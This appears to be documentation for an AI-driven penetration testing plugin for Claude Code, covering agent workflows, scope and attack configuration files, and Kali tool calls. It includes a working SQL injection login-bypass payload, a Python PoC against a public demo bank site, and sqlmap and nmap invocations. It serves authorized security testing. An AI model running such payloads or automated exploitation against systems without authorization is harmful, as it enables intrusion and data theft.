---
name: claude-pentest-framework
description: AI-driven penetration testing framework for Claude Code with 15 agents, 6 skill coordinators, and 63 attack categories coordinated through structured engagement workflows
triggers:
  - run a penetration test with Claude
  - set up offensive security testing with AI
  - configure a pentest engagement scope
  - launch automated security assessment
  - connect Kali Linux server for pentesting
  - coordinate AI pentest agents
  - define attack profile for security testing
  - execute structured vulnerability assessment
---

# claude-pentest Framework

> Skill by [ara.so](https://ara.so) — Security Skills collection.

claude-pentest is a comprehensive penetration testing framework for Claude Code that coordinates 15 specialized agents across 6 skill domains and 63 attack categories. It provides structured, human-in-the-loop, evidence-driven security assessments with automatic PoC generation, HTTP evidence capture, and Playwright screenshots.

## Core Concepts

**Agent Coordination Framework**: Unlike traditional scanners, claude-pentest orchestrates specialized executor agents that each follow a strict 4-phase workflow (reconnaissance → planning → approval → execution). Escalation happens afterwards, in the orchestrator's time-budget loop.

**Human-in-the-Loop**: Every exploitation attempt requires explicit operator approval. Claude cannot proceed to active exploitation without confirmation.

**Evidence-First**: All findings include working PoCs (`poc.py`), captured output (`poc_output.txt`), HTTP evidence, and screenshots. No theoretical findings.

**Structured Outputs**: Machine-readable JSON + markdown analysis written to `outputs/{engagement}/`.

## Installation

### Add Marketplace Repository

```bash
# Inside Claude Code
/plugin marketplace add Stickman230/claude-pentest
```

### Install Plugin

```bash
# Inside Claude Code
/plugin install pentest@claude-pentest
```

The plugin installs to `.claude/` in your project directory. All agents, skills, and slash commands become available immediately.

### Optional: Kali Server (MKS)

For server-side testing (nmap, sqlmap, gobuster, Metasploit), deploy [MCP-Kali-Server](https://github.com/Wh0am123/MCP-Kali-Server) on a Kali Linux host:

```bash
# On Kali Linux
git clone https://github.com/Wh0am123/MCP-Kali-Server
cd MCP-Kali-Server
# Follow MCP-Kali-Server setup instructions

# In Claude Code
/pentest:pentest-kali
# Enter server URL: http://192.168.1.10:5000
```

## Key Commands

### Launch Full Engagement

```bash
/pentest:pentest
```

**Flow**:
1. Isolate session to pentest plugin (recommended)
2. Configure scope (target, engagement name, out-of-scope, time budget, auth, thoroughness)
3. Select attack profile (Full / Web app / API & cloud / Custom)
4. Configure Kali server integration (optional)
5. Review engagement summary
6. Execute: pre-flight → recon → planning → approval → executor deployment → time-budget loop → report

**Session Isolation**: When enabled, Claude constrains itself to pentest plugin agents only, preventing interference from other plugins.

### Define Scope

```bash
/pentest:pentest-scope
```

Configure or update engagement scope without launching. Writes `.pentest-scope.json`:

```json
{
  "target": "https://demo.testfire.net",
  "engagement_name": "altoro-mutual-pentest",
  "out_of_scope": "*.testfire.net/admin, production databases",
  "time_budget": "2 hours",
  "auth": "username: jsmith, password: demo1234",
  "thoroughness": "Medium",
  "output_formats": ["json", "markdown", "csv"],
  "status": "pending"
}
```

**Thoroughness Levels**:
- **Light**: Quick scan, common vulnerabilities only
- **Medium**: Standard pentest, broad coverage
- **Deep**: Extended testing, edge cases
- **Full**: Comprehensive, maximum time investment
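
Before launching, it can help to sanity-check the scope file by hand. The following is a minimal sketch, not part of the plugin: the field names come from the example above, while the set of required fields, the check logic, and the helper names `validate_scope` and `load_scope` are assumptions made for illustration.

```python
import json
from pathlib import Path

# Field names are taken from the example scope file. Which fields are
# mandatory is an assumption of this sketch, not documented plugin behavior.
REQUIRED_FIELDS = {"target", "engagement_name", "time_budget", "thoroughness"}
THOROUGHNESS_LEVELS = {"Light", "Medium", "Deep", "Full"}


def validate_scope(scope: dict) -> list[str]:
    """Return a list of human-readable problems; an empty list means OK."""
    missing = sorted(REQUIRED_FIELDS - set(scope))
    problems = [f"missing field: {name}" for name in missing]

    level = scope.get("thoroughness")
    if level is not None and level not in THOROUGHNESS_LEVELS:
        problems.append(f"unknown thoroughness: {level!r}")

    if "target" in scope and not str(scope["target"]).strip():
        problems.append("target is empty")
    return problems


def load_scope(path: str = ".pentest-scope.json") -> dict:
    """Read the scope file from the project root."""
    return json.loads(Path(path).read_text(encoding="utf-8"))
```

Calling `validate_scope(load_scope())` from the project root returns an empty list when the file passes these checks.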

### Define Attack Profile

```bash
/pentest:pentest-attacks
```

Select which attack categories to cover. Writes `.pentest-attacks.json`:

```json
{
  "mode": "web_application",
  "selected_categories": [
    "injection",
    "client_side",
    "authentication",
    "api_security",
    "business_logic"
  ],
  "skill_coordinators": [
    "injection-coordinator",
    "client-side-coordinator",
    "auth-coordinator"
  ],
  "executors": [
    "sql-injection-agent",
    "xss-agent",
    "auth-bypass-agent"
  ],
  "status": "pending"
}
```

**Attack Profiles**:
- **Full suite**: All 63 categories (12 domains)
- **Web application**: Injection, client-side, server-side, authentication, API, business logic
- **API & cloud**: API security, cloud & containers, IP infrastructure, CVE testing, domain recon
- **Custom**: Multi-select from all categories

### Connect Kali Server

```bash
/pentest:pentest-kali
```

Configures the remote MCP-Kali-Server (MKS) integration. Writes `.pentest-mks.json`:

```json
{
  "server_url": "http://192.168.1.10:5000",
  "status": "active",
  "tools_available": {
    "nmap": true,
    "gobuster": true,
    "dirb": true,
    "nikto": true,
    "sqlmap": true,
    "hydra": true,
    "john": true,
    "metasploit": true
  },
  "verified_at": "2026-06-08T14:30:00Z"
}
```

**Tool Endpoints** (when MKS active):
```bash
# nmap scan via MKS
curl -X POST http://192.168.1.10:5000/nmap \
  -H "Content-Type: application/json" \
  -d '{"target": "192.168.1.20", "options": "-sV -sC"}'

# sqlmap via MKS
curl -X POST http://192.168.1.10:5000/sqlmap \
  -H "Content-Type: application/json" \
  -d '{"url": "http://target.com/api?id=1", "options": "--risk=2 --level=2"}'
```

### Exit Engagement

```bash
/pentest:pentest-exit
```

**Flow**:
1. Read findings from `outputs/{engagement}/findings/`
2. Flush unsaved notes to disk
3. Output severity-bucketed summary (Critical/High/Medium/Low/Info)
4. Reset `.pentest-scope.json` and `.pentest-attacks.json` to `status: pending`
5. Lift session isolation
6. Prompt to run `/clear`
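
The severity summary in step 3 can be approximated offline from the findings directory. This is a minimal sketch, assuming each `finding_*.json` file carries a `severity` field as in the finding schema; `bucket_by_severity` and `load_findings` are hypothetical helper names, and treating missing or unrecognized severities as Info is an assumption of the sketch.

```python
import json
from collections import Counter
from pathlib import Path

SEVERITY_ORDER = ["Critical", "High", "Medium", "Low", "Info"]


def bucket_by_severity(findings: list[dict]) -> dict[str, int]:
    """Count findings per severity, always returning all five buckets."""
    counts = Counter()
    for finding in findings:
        severity = finding.get("severity")
        # Assumption: anything missing or unrecognized is reported as Info.
        counts[severity if severity in SEVERITY_ORDER else "Info"] += 1
    return {level: counts[level] for level in SEVERITY_ORDER}


def load_findings(findings_dir: str) -> list[dict]:
    """Load every finding_*.json file from an engagement's findings folder."""
    paths = sorted(Path(findings_dir).glob("finding_*.json"))
    return [json.loads(path.read_text(encoding="utf-8")) for path in paths]
```

Running `bucket_by_severity(load_findings("outputs/altoro-mutual-pentest/findings"))` would produce one count per severity level.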

## Session State Files

Three JSON files at project root persist configuration:

| File | Purpose | Written By |
|------|---------|-----------|
| `.pentest-scope.json` | Target, timing, thoroughness | `/pentest:pentest-scope`, `/pentest:pentest` |
| `.pentest-attacks.json` | Attack categories, skill mapping | `/pentest:pentest-attacks`, `/pentest:pentest` |
| `.pentest-mks.json` | Kali server URL, tool availability | `/pentest:pentest-kali` |

## Agent Architecture

### 15 Executor Agents

Each follows a 4-phase workflow:

1. **Reconnaissance**: Passive information gathering
2. **Planning**: Attack vector identification
3. **Approval**: Human-in-the-loop confirmation
4. **Execution**: Active exploitation with PoC generation
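
The approval gate between planning and execution can be pictured as a small state machine. The sketch below is illustrative only: the phase names come from the list above, but the classes `ExecutorWorkflow` and `ApprovalRequired` are hypothetical and do not describe how the plugin's agents are implemented.

```python
from enum import Enum


class Phase(Enum):
    RECONNAISSANCE = 1
    PLANNING = 2
    APPROVAL = 3
    EXECUTION = 4


class ApprovalRequired(Exception):
    """Raised when execution is requested without operator approval."""


class ExecutorWorkflow:
    """Tracks one agent's phase and refuses to skip the approval gate."""

    def __init__(self) -> None:
        self.phase = Phase.RECONNAISSANCE
        self.approved = False

    def approve(self) -> None:
        """Record the operator's confirmation; only valid in the approval phase."""
        if self.phase is not Phase.APPROVAL:
            raise ValueError("approval can only be recorded in the approval phase")
        self.approved = True

    def advance(self) -> Phase:
        """Move to the next phase, blocking execution until approved."""
        if self.phase is Phase.EXECUTION:
            raise ValueError("already in the final phase")
        if self.phase is Phase.APPROVAL and not self.approved:
            raise ApprovalRequired("operator approval is required before execution")
        self.phase = Phase(self.phase.value + 1)
        return self.phase
```

The design point is that `advance()` cannot reach `Phase.EXECUTION` unless `approve()` was called while the workflow sat in the approval phase.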

**Specialized Agents** (8 of the 15 are listed here):
- `sql-injection-agent`: SQL injection testing (error-based, blind, time-based)
- `xss-agent`: XSS testing (reflected, stored, DOM-based)
- `xxe-agent`: XML External Entity exploitation
- `ssrf-agent`: Server-Side Request Forgery
- `auth-bypass-agent`: Authentication mechanism testing
- `api-security-agent`: REST/GraphQL endpoint testing
- `cloud-security-agent`: Cloud misconfiguration detection
- `cve-agent`: Known vulnerability exploitation

### 6 Skill Coordinators

Coordinate related executors:

- `injection-coordinator`: SQL, NoSQL, LDAP, command injection
- `client-side-coordinator`: XSS, CSRF, clickjacking, CORS
- `server-side-coordinator`: XXE, SSRF, file upload, deserialization
- `auth-coordinator`: Broken auth, session management, crypto
- `api-coordinator`: API security, GraphQL, WebSocket
- `infra-coordinator`: Network, cloud, CVE, domain recon

## Output Structure

```
outputs/
└── {engagement_name}/
    ├── findings/
    │   ├── finding_001_sql_injection.json
    │   ├── finding_001_poc.py
    │   ├── finding_001_poc_output.txt
    │   ├── finding_001_screenshot.png
    │   └── finding_001_http_evidence.txt
    ├── processed/
    │   ├── findings/
    │   └── analysis.json
    ├── pentest-report.json
    └── report.md
```

### Finding Schema

```json
{
  "finding_id": "001",
  "title": "SQL Injection in Login Form",
  "severity": "Critical",
  "cvss_score": 9.8,
  "attack_category": "injection",
  "agent": "sql-injection-agent",
  "target_url": "https://demo.testfire.net/login.jsp",
  "vulnerable_parameter": "uid",
  "attack_vector": "' OR '1'='1' --",
  "impact": "Full database access, authentication bypass",
  "poc_file": "finding_001_poc.py",
  "poc_output_file": "finding_001_poc_output.txt",
  "screenshot_file": "finding_001_screenshot.png",
  "http_evidence_file": "finding_001_http_evidence.txt",
  "remediation": "Use parameterized queries, input validation",
  "references": ["CWE-89", "OWASP A03:2021"],
  "verified_at": "2026-06-08T14:45:00Z"
}
```
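
Because every finding is expected to ship with its evidence, a quick completeness check is easy to script. The following sketch assumes that every key ending in `_file` names a file stored next to the finding JSON, as in the schema above; `referenced_evidence_files` and `missing_evidence` are hypothetical helpers, not plugin functions.

```python
from pathlib import Path


def referenced_evidence_files(finding: dict) -> list[str]:
    """Collect the file names a finding points to (keys ending in '_file')."""
    return [
        value
        for key, value in finding.items()
        if key.endswith("_file") and isinstance(value, str)
    ]


def missing_evidence(finding: dict, findings_dir: str) -> list[str]:
    """Return the referenced evidence files that do not exist on disk."""
    base = Path(findings_dir)
    return [
        name
        for name in referenced_evidence_files(finding)
        if not (base / name).is_file()
    ]
```

An empty list from `missing_evidence` means the PoC, its output, the screenshot, and the HTTP evidence are all present for that finding.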

## Common Patterns

### Quick Web App Pentest

```bash
# Define scope
/pentest:pentest-scope
# Enter:
# - Target: https://demo.testfire.net
# - Engagement name: altoro-quick
# - Out-of-scope: None
# - Time budget: 1 hour
# - Auth: None
# - Thoroughness: Medium
# - Formats: json, markdown

# Use web app profile (skip attack selection)
/pentest:pentest
# Select: Use Web Application profile when prompted
```

### API Pentest with Kali Server

```bash
# Connect Kali first
/pentest:pentest-kali
# Enter: http://192.168.1.10:5000

# Define scope
/pentest:pentest-scope
# Target: https://api.example.com/v1
# Thoroughness: Deep

# Select API profile
/pentest:pentest-attacks
# Mode: API & cloud profile

# Launch
/pentest:pentest
```

### Custom Attack Surface

```bash
# Define specific categories
/pentest:pentest-attacks
# Mode: Custom
# Select: SQL injection, SSRF, XXE, authentication bypass

/pentest:pentest
```

### Reuse Saved Configuration

```bash
# Scope and attacks already defined in previous session
/pentest:pentest
# Responds: "Found existing scope (.pentest-scope.json)"
# Select: Reuse existing scope
# Responds: "Found existing attack profile (.pentest-attacks.json)"
# Select: Use saved profile
```

## Time Budget and Escalation

The engagement operates within a **time budget** (quota) defined in scope. The orchestrator:

1. Allocates the budget across recon, executor deployment, and escalation phases
2. Runs a **time-budget loop** for escalation after initial findings
3. Deploys Metasploit via MKS for post-exploitation **only if** a CVE or RCE is confirmed
4. Never runs speculative exploitation

**Example Time Budget Allocation** (2 hour total):
- Pre-flight: 5 minutes
- Recon: 20 minutes
- Planning: 10 minutes
- Executor deployment: 60 minutes (parallel)
- Time-budget loop (escalation): 20 minutes
- Report generation: 5 minutes
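
To estimate how a different budget might be split, the example figures can be scaled. This is a rough sketch under a loud assumption: the source only gives the 2-hour example, so proportional scaling is a guess at the orchestrator's behavior, and `scale_allocation` and the phase keys are hypothetical names.

```python
# Minutes per phase from the 2-hour example above (they sum to 120).
EXAMPLE_ALLOCATION = {
    "pre_flight": 5,
    "recon": 20,
    "planning": 10,
    "executor_deployment": 60,
    "escalation_loop": 20,
    "report": 5,
}


def scale_allocation(total_minutes: int) -> dict[str, int]:
    """Scale the example split to a new total, in whole minutes."""
    base_total = sum(EXAMPLE_ALLOCATION.values())
    scaled = {
        phase: minutes * total_minutes // base_total
        for phase, minutes in EXAMPLE_ALLOCATION.items()
    }
    # Minutes lost to integer rounding go to the longest phase so the
    # parts always add up to the requested total.
    scaled["executor_deployment"] += total_minutes - sum(scaled.values())
    return scaled
```

For a 4-hour engagement, `scale_allocation(240)` simply doubles each figure in the example.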

## Configuration Examples

### Authenticated Testing

```json
{
  "target": "https://app.example.com",
  "auth": "Bearer token: $AUTH_TOKEN (stored in env), cookie: session_id=$SESSION_ID",
  "thoroughness": "Deep"
}
```

Reference environment variables instead of hardcoding:

```python
# In PoC scripts
import os

AUTH_TOKEN = os.environ.get("AUTH_TOKEN")
SESSION_ID = os.environ.get("SESSION_ID")

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Cookie": f"session_id={SESSION_ID}"
}
```

### Multi-Target Scope

```json
{
  "target": "https://app.example.com, https://api.example.com, 192.168.1.0/24",
  "out_of_scope": "192.168.1.1 (gateway), *.example.com/admin",
  "time_budget": "4 hours"
}
```
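
With mixed URL and CIDR targets, it is worth double-checking whether a given address falls inside the declared scope. The sketch below uses the standard `ipaddress` module; `split_targets` and `ip_in_scope` are hypothetical helpers, and excluded addresses are passed in explicitly because the free-text `out_of_scope` format (for example `192.168.1.1 (gateway)`) is not formally specified.

```python
import ipaddress


def split_targets(target_field: str) -> list[str]:
    """Split the comma-separated target string into individual entries."""
    return [item.strip() for item in target_field.split(",") if item.strip()]


def ip_in_scope(ip: str, targets: list[str], excluded_ips: list[str]) -> bool:
    """True if ip is inside a CIDR target and not explicitly excluded."""
    address = ipaddress.ip_address(ip)
    if any(address == ipaddress.ip_address(item) for item in excluded_ips):
        return False
    for target in targets:
        try:
            network = ipaddress.ip_network(target, strict=False)
        except ValueError:
            continue  # a URL or hostname, not an IP range
        if address in network:
            return True
    return False
```

Only IP targets are checked here; URL and hostname targets would need separate matching rules.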

### API-Specific Configuration

```json
{
  "target": "https://api.example.com/v1",
  "auth": "API key: $API_KEY (header: X-API-Key)",
  "selected_categories": [
    "api_security",
    "injection",
    "authentication",
    "business_logic"
  ]
}
```

## Evidence Files

### PoC Script Example

`finding_001_poc.py`:
```python
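#!/usr/bin/env python3
"""PoC for finding 001: SQL injection in the login form."""
import sys

import requests

TARGET_URL = "https://demo.testfire.net/login.jsp"
PAYLOAD = "' OR '1'='1' --"


def exploit() -> bool:
    """Submit the payload as the username and check for a logged-in page."""
    data = {
        "uid": PAYLOAD,
        "passw": "anything",
    }

    # A timeout keeps the script from hanging if the target is unreachable.
    response = requests.post(TARGET_URL, data=data, timeout=15)

    if response.status_code == 200 and "Welcome" in response.text:
        print("[+] SQL Injection successful")
        print(f"[+] Authentication bypassed with payload: {PAYLOAD}")
        return True

    print("[-] Exploitation failed")
    return False


if __name__ == "__main__":
    # Exit non-zero on failure so callers can detect the result.
    sys.exit(0 if exploit() else 1)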
```

### HTTP Evidence Format

`finding_001_http_evidence.txt`:
```
=== REQUEST ===
POST /login.jsp HTTP/1.1
Host: demo.testfire.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

uid=' OR '1'='1' --&passw=anything

=== RESPONSE ===
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: AltoroAccounts=...

<!DOCTYPE html>
<html>
<body>
<h1>Welcome, Admin</h1>
...
```

## Troubleshooting

### Engagement Won't Start

**Symptom**: `/pentest:pentest` fails at pre-flight check.

**Solution**: Verify target is reachable:
```bash
curl -I https://target.example.com
```

Check `.pentest-scope.json` for valid target format.

### Kali Server Connection Failed

**Symptom**: MKS tools unavailable, falling back to local bash.

**Solution**: Test MKS connectivity:
```bash
curl http://192.168.1.10:5000/health
```

Verify firewall rules allow connection. Re-run `/pentest:pentest-kali`.

### Missing Findings

**Symptom**: Engagement completes but `outputs/{name}/findings/` is empty.

**Solution**: Check thoroughness level (Light may produce fewer findings). Review time budget allocation. Examine `outputs/{name}/processed/analysis.json` for agent logs.

### PoC Scripts Fail

**Symptom**: `poc.py` returns errors when executed manually.

**Solution**: Install dependencies:
```bash
pip install requests playwright
python -m playwright install
```

Verify environment variables are set:
```bash
export AUTH_TOKEN="your_token"
export SESSION_ID="your_session"
```

### Agent Timeout

**Symptom**: Executor agents time out during deployment.

**Solution**: Increase time budget in scope. Reduce thoroughness level. Disable MKS if network latency is high.

### Session Isolation Not Lifted

**Symptom**: After `/pentest:pentest-exit`, other plugins still unavailable.

**Solution**: Run `/clear` to fully reset context:
```bash
/clear
```

## Attack Coverage

**12 Attack Domains**:
1. **Injection**: SQL, NoSQL, LDAP, OS command, SSTI, log injection
2. **Client-Side**: XSS, CSRF, clickjacking, CORS, DOM clobbering
3. **Server-Side**: XXE, SSRF, file upload, deserialization, path traversal
4. **Authentication**: Broken auth, session management, weak crypto
5. **API Security**: REST, GraphQL, WebSocket, API key exposure
6. **Business Logic**: Workflow bypass, race conditions, price manipulation
7. **Access Control**: IDOR, privilege escalation, missing function-level access control
8. **Configuration**: Security misconfiguration, default credentials, verbose errors
9. **Cloud & Containers**: S3 buckets, Docker, Kubernetes, cloud metadata
10. **IP Infrastructure**: Network scanning, service enumeration, SSL/TLS
11. **CVE Testing**: Known vulnerabilities, version detection, patch validation
12. **Domain Recon**: DNS enumeration, subdomain discovery, certificate transparency

**63 Sub-Categories** mapped to specific executor agents and skill coordinators.

## Legal and Ethical Use

**ALWAYS obtain written permission before testing any system you do not own.**

claude-pentest is designed for:
- Authorized penetration testing engagements
- Bug bounty programs (within scope)
- Security research in controlled environments
- Red team exercises with proper authorization

**Unauthorized use is illegal and unethical.**

## Integration with Claude Code

The framework is designed to work within Claude Code's agent harness:

- **One level of subagent nesting**: `/pentest:pentest` orchestrates from main session
- **Slash command discovery**: Commands auto-register with Claude Code
- **Session isolation**: Prevents plugin interference during active engagements
- **Context window management**: `/clear` recommended between engagements

When active, claude-pentest coordinates all testing activities through structured workflows, ensuring evidence capture, human approval gates, and organized output for every finding.

Source: creator's repository, aradotso/security-skills